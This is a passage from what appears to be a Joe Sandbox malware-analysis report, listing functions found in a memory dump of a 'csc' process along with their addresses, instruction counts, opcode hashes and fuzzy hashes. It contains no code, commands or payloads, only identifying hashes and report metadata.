                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8af0524d10c2d1eeb4b347ef5f26006178806bbc63ef6a1b351fbe74477f14c4
                                                      • Instruction ID: 9bb388ede0e346fcba2fa87a5a629f1f819a8b125a4bb36771fd9f03b9cefdee
                                                      • Opcode Fuzzy Hash: 8af0524d10c2d1eeb4b347ef5f26006178806bbc63ef6a1b351fbe74477f14c4
                                                      • Instruction Fuzzy Hash: 2921B072214640DFCB2AEF68D956F9AB7F5FF18708F15496DE10687AA1CB74E800CB44
                                                      Function 053A8770 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d9f8bdcf7f077b897142c3a4a3c853ac6f42a3d0763d3c0a7f3fd1f269856f3
                                                      • Instruction ID: 92a681913bed583805d06cb3b85a1e4a35295ebb16f53da0be910b339de2ffeb
                                                      • Opcode Fuzzy Hash: 1d9f8bdcf7f077b897142c3a4a3c853ac6f42a3d0763d3c0a7f3fd1f269856f3
                                                      • Instruction Fuzzy Hash: AB118F377056119BCB16CF59C580A66F7EAFF8A750B198069ED09EF204D6F3D901C790
                                                      Function 053D0124 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction ID: e75b35f15e6e611f8dd44145fd70fcd1d2ad6100e89e8c0e5db0068120573006
                                                      • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction Fuzzy Hash: 5211EF77600604AFE7269F54EC49FAAFBB9EB80B50F100029F6008B180E6B1EE44CB64
                                                      Function 053A3720 Relevance: .1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70cd47d851e1e3236f54fb5df47fb5af90fdaf7602b27b8ff778ed7313ff8cd9
                                                      • Instruction ID: 01782b210e7ed06a97d120986b87aa1a6412481204bb0fe372328ca857525f92
                                                      • Opcode Fuzzy Hash: 70cd47d851e1e3236f54fb5df47fb5af90fdaf7602b27b8ff778ed7313ff8cd9
                                                      • Instruction Fuzzy Hash: 8D210B76A042098BEB16CF6DD4497EEB7B4FF88318F298418D813972D0CBF99945C750
                                                      Function 053A80E9 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15b67d6a4b24fe20472a49a9935c7081a95ee26cb99ac70fc9c0d3f41716378e
                                                      • Instruction ID: d2651ea6a3278cf64e1ade90200380768eb6cbf6099e730fd962b27b888c7f59
                                                      • Opcode Fuzzy Hash: 15b67d6a4b24fe20472a49a9935c7081a95ee26cb99ac70fc9c0d3f41716378e
                                                      • Instruction Fuzzy Hash: 5C216D76A00205DFCB14CF98C581AAEFBB6FB88318F24416DD505AB310DB71AD06CBD0
                                                      Function 053D674D Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e76dfb95a17ca56a2eb17d5c250920a53cb89ec99c5059b1a66217411328e72e
                                                      • Instruction ID: 0e647a3c045809482918e3f6ae7baf99762e3c844f70d847d05930b22eb47b43
                                                      • Opcode Fuzzy Hash: e76dfb95a17ca56a2eb17d5c250920a53cb89ec99c5059b1a66217411328e72e
                                                      • Instruction Fuzzy Hash: A8218C76610A00EFD760CF68D882FA6B3F9FF44250F40882DE5AAC7650DB71A850CB60
                                                      Function 053D66B0 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da3648037c3a690df74750c46c0a3de88aa3e3e8cac5a54bd2eb34561d755a00
                                                      • Instruction ID: 2c6f9af69361adbfb7854fedb2e92973a8c0acf54cb7694ca9e908d66f909d06
                                                      • Opcode Fuzzy Hash: da3648037c3a690df74750c46c0a3de88aa3e3e8cac5a54bd2eb34561d755a00
                                                      • Instruction Fuzzy Hash: AE11C177B01208DFCB64CF59E582E9AFBF9AF94650B024079E916DB310DAB4DD00CBA0
                                                      Function 053C27ED Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c194ec182eb82d8cb414f10126f2ba5b3ee667373d3dae7c7f4e73412b5b0ebe
                                                      • Instruction ID: 7c1976ca801b140dc411bdb51e258e1c6eef2d55b19c8b995ff9611fba6b0d16
                                                      • Opcode Fuzzy Hash: c194ec182eb82d8cb414f10126f2ba5b3ee667373d3dae7c7f4e73412b5b0ebe
                                                      • Instruction Fuzzy Hash: 34014432709744ABE327E62ADC48FA77B9EEF40650F1900BAF9018B680DA64EC00C360
                                                      Function 053A4690 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d85a67e608b4cb24f370925788e0b00aaf7dd52b0885e3a61592a76c9705aaaf
                                                      • Instruction ID: e1ed8d2b8317b33d9d29e7b8ed2182999be316397f1f3835d503102c22c3494b
                                                      • Opcode Fuzzy Hash: d85a67e608b4cb24f370925788e0b00aaf7dd52b0885e3a61592a76c9705aaaf
                                                      • Instruction Fuzzy Hash: 0D119A37204684AFDF26CF59D845F967BA9EB86A64F04411AF825CB660C7F6E800CF60
                                                      Function 0545D6F0 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                      • Instruction ID: 9ca0db1e8e86bd60afb76fff22eae093adacd9153dd11af1f259cb676bc2839a
                                                      • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                      • Instruction Fuzzy Hash: 64015E76B04209EB9B05EAA6DD44DEF7BBDEF85A54F14005AA905D7201E770EA01C7B0
                                                      Function 053CB052 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e96546010a02c935a59891a7f75f4b92a7b2865fee0d4748a3d4cb3b100ca82
                                                      • Instruction ID: c593ec3621f0c2508a59560a08c15291e9b8804b0c742bb610671f5421a62823
                                                      • Opcode Fuzzy Hash: 7e96546010a02c935a59891a7f75f4b92a7b2865fee0d4748a3d4cb3b100ca82
                                                      • Instruction Fuzzy Hash: 7701D672B003106BD720ABA99C96F6BFBEDEF84614F4404ADE60687241D770ED009761
                                                      Function 053D6620 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6200d4c824dfa7d8332d6d448c50135e7aa23b47d8d7b0072d2e9d20af708fa6
                                                      • Instruction ID: 77d192314be7179498aa97fbc91cc1f1627d77d4dfa243e57a6a9f8b25e252b2
                                                      • Opcode Fuzzy Hash: 6200d4c824dfa7d8332d6d448c50135e7aa23b47d8d7b0072d2e9d20af708fa6
                                                      • Instruction Fuzzy Hash: 2211A577A00715ABDB22DF99DDC2B9EF7B8FF84740F510459DA11A7200DB71AD018BA0
                                                      Function 053CE53E Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction ID: b8f98ebd999f68d351a0410efe2d6cad9beabedca4b4738cf7aa3f71de1002d4
                                                      • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction Fuzzy Hash: 0E1129726056D1ABEB339B18C844BA63B99BB40744F2914F6DD0187B81F338CC46D750
                                                      Function 05397330 Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6757e7fc2d9abb0847f6a04340bab24f99ee5134a2ceb3991b245403e023979a
                                                      • Instruction ID: 899e6f62c9bffd61baf3bdf23a10b9afe5174ab2d7691c1ebb3d66332cbe52a4
                                                      • Opcode Fuzzy Hash: 6757e7fc2d9abb0847f6a04340bab24f99ee5134a2ceb3991b245403e023979a
                                                      • Instruction Fuzzy Hash: F811A0B16206149FDB25CFA5C886FAB77E8FB45314F054429ED86C7250D775EC008BA0
                                                      Function 0541E1D0 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0792f7facfe280b75e45ef31f453aca554718c781cca473393cce643f1829f5a
                                                      • Instruction ID: 63fffbcfaa5ba0c3c1a21b343371ee89a5f99f47e3dd03ac818a36cc5f76f3dd
                                                      • Opcode Fuzzy Hash: 0792f7facfe280b75e45ef31f453aca554718c781cca473393cce643f1829f5a
                                                      • Instruction Fuzzy Hash: 85118E36241240EFCB1AEF18C995F56BBB9FF48B44F2000A5ED059F651C235ED01CA90
                                                      Function 053A208A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction ID: c36225eeaec4d52679693d8a552ccbb5726d8d3ed7aff62b4b98425b70002852
                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction Fuzzy Hash: 2801B1376001108BDF15DA69D884EA3776BFFC4600F5645A9FD068F255DAB1DC81C790
                                                      Function 053DE5CF Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96e86911a7ae392e241c2cb3aca1fde8a37f1307a7390866f0c3b4deb7abcbd5
                                                      • Instruction ID: 82f9df1d05f0d9c03654dbd7c52eb3b7041205d1938b7ed858096e40bce40167
                                                      • Opcode Fuzzy Hash: 96e86911a7ae392e241c2cb3aca1fde8a37f1307a7390866f0c3b4deb7abcbd5
                                                      • Instruction Fuzzy Hash: 2A018472301910BBD715AB69CD88E97BBACFB456A07010626B60587A51DB74EC11C6A4
                                                      Function 0539C020 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction ID: f7f7f7fe5154c07c0e2e01130007ce23087ca1c88f1556221650ac993cc27251
                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction Fuzzy Hash: 4C01B5722007489FDF26D666D804EA777EEFFC4210F04881DA6568BA40DAB4E801CB60
                                                      Function 053E20F0 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c7ff9d3078eae6b431791d56fe4c73062dd8402fdb16497d296a4027b1373507
                                                      • Instruction ID: 2e7e7cce4e6a5312f4a5d31f209da41dc447f74e0b9af6a831752476acfc45a1
                                                      • Opcode Fuzzy Hash: c7ff9d3078eae6b431791d56fe4c73062dd8402fdb16497d296a4027b1373507
                                                      • Instruction Fuzzy Hash: E5116935A0121CABDF05EFA4CC55FAF7BBAEB48640F004099F9019B290EA35AE11CB90
                                                      Function 0545F5BE Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8be3ff7d51a1677a96ea72cdd0fdc9c880eabb47133212a1c5aca6c8631204c4
                                                      • Instruction ID: 2aa91efff9e0d79e9c65c1adf14fd200080899631a8ada681071a7448d6d19e8
                                                      • Opcode Fuzzy Hash: 8be3ff7d51a1677a96ea72cdd0fdc9c880eabb47133212a1c5aca6c8631204c4
                                                      • Instruction Fuzzy Hash: 25019E71A00258BBCB04EF69D846FEEBBF8EF44710F004466B900EB281DA74EE05CB91
                                                      Function 0545F453 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e72661b01dab22b48ec562c210ff3bd11eea336e9741e53a721b647ae6f1022b
                                                      • Instruction ID: 6013755ea4968ae9976decf1626e8a605c04da9a595228bada3d72d136c84293
                                                      • Opcode Fuzzy Hash: e72661b01dab22b48ec562c210ff3bd11eea336e9741e53a721b647ae6f1022b
                                                      • Instruction Fuzzy Hash: D3014C71A10258ABDB14EF69D846BAEBBB8EF45710F404066B900EB281DA74EA05CB95
                                                      Function 053DD1D0 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                      • Instruction ID: adf70e6c223298fe4a9f34730b60cd72594da801f093227b51819b166edfba75
                                                      • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                      • Instruction Fuzzy Hash: F7014773B051089BDB11DA54F804FE6B7BAEB84624F10455AFE158F780DB74DA01C7A0
                                                      Function 053BE016 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction ID: c62aa237b74fe4c9bc37300759c9a6b4791b2efec42911f4a06179ba80e6942d
                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction Fuzzy Hash: AE017C322045809FE322C65EC948FA677EDFB84B50F0904A6EA06CBA91D6B8DC40C621
                                                      Function 053A2582 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f3e9ee810010a3678fea4e1d59fbc7eccbbae493813227e014eeab51420f0e3
                                                      • Instruction ID: 7ad7f3ae0d2ac3ee1a1a62fb8d816524c6abd89f3926ad7e7191952077cc7418
                                                      • Opcode Fuzzy Hash: 9f3e9ee810010a3678fea4e1d59fbc7eccbbae493813227e014eeab51420f0e3
                                                      • Instruction Fuzzy Hash: 7AF0A433741A20B7C732DB56CD44F57BAAFEB84BA0F154529BA0597640DA70ED01DBA0
                                                      Function 0546972B Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                      Function 05475636 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 581074a5f18207f453f69a046ecf469b469c9bc73b575e9bf00ec865b703a6f9
                                                      • Instruction ID: c2a3fc97328530ad16041ce1aa09124feec7b895b96c3d0cbc53d68e7301cc7c
                                                      • Opcode Fuzzy Hash: 581074a5f18207f453f69a046ecf469b469c9bc73b575e9bf00ec865b703a6f9
                                                      • Instruction Fuzzy Hash: 8B116D74E10259EBCB04DFA8D445ADEB7B4EF18704F10849AB915EB380E734EA02CB54
                                                      Function 05475537 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f819057bf3e3ce9ea876c788b2629a53e1bbcd54e40020b3920938cd6a8bf2d0
                                                      • Instruction ID: b792076eead3d7664e3c1d74836851a24a82e542d303a75886acb4a9c63bdc2c
                                                      • Opcode Fuzzy Hash: f819057bf3e3ce9ea876c788b2629a53e1bbcd54e40020b3920938cd6a8bf2d0
                                                      • Instruction Fuzzy Hash: E2110970A10259DFDB04DFA9D545AEEBBF4BF08200F0442AAE509EB382E634D9418B90
                                                      Function 053D5734 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                      • Instruction ID: 33d550610477bf3fe09bcf253ff3fe0d52bbf6d663cd4a43af9383401e2ae7d9
                                                      • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                      • Instruction Fuzzy Hash: 35F0FF73A05214AFE319CF5CD880FAAFBEDEB45650F15406AD501DB230E6B1EE04CAA4
                                                      Function 05475152 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ae4756dc6f5f94afe072e235275f9060003e2c34d841c7c6c2c8b4c485d763a5
                                                      • Instruction ID: a860a8965c4573900df5153d63307b4b884b8b7de277bb46efa55e66492d5224
                                                      • Opcode Fuzzy Hash: ae4756dc6f5f94afe072e235275f9060003e2c34d841c7c6c2c8b4c485d763a5
                                                      • Instruction Fuzzy Hash: 0A012C71E1025DABDB04DFA9D9859EEBBF8FF48700F10445AF901F7380E674AA018BA0
                                                      Function 05475060 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 174e4866c8d505dc354d232fb58c122dd948f58c0216f8fe3ae7db138781fe71
                                                      • Instruction ID: 7e3abddfe3f90bc9146bb2a01f638f506cd227dc38392a82cfa52721a326f398
                                                      • Opcode Fuzzy Hash: 174e4866c8d505dc354d232fb58c122dd948f58c0216f8fe3ae7db138781fe71
                                                      • Instruction Fuzzy Hash: 06012C71A1025DAFCB04DFA9D9859EEBBF8EF48700F10445AF901FB381D674AA018BA0
                                                      Function 053CC073 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction ID: 3c8b744bbea35a4e1c2b45be32d5e056a6f1b26d0bd40e3182a9e90479890f6a
                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction Fuzzy Hash: 94F062B3600625ABD335CF4DDC40E57FBEAEBC4A90F058169A559DB220EA71ED05CB90
                                                      Function 054750D9 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b42ff9485269e784a898912d11d045f148e5c0980df962691745f81fdd9cb0c8
                                                      • Instruction ID: 444ffda38a90f8f02a3610bfa3a8e2216c8f1b0523a3172bd96340932cdb9c6e
                                                      • Opcode Fuzzy Hash: b42ff9485269e784a898912d11d045f148e5c0980df962691745f81fdd9cb0c8
                                                      • Instruction Fuzzy Hash: 0F012171A1021DABDB04DF69E9459DEB7F8EF48700F50445AF501F7380E674A9018BA0
                                                      Function 0545F78A Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5685e2e3ce0f22822646c9e784cc23c1de0808836b4f1f1dd515a5578037b12b
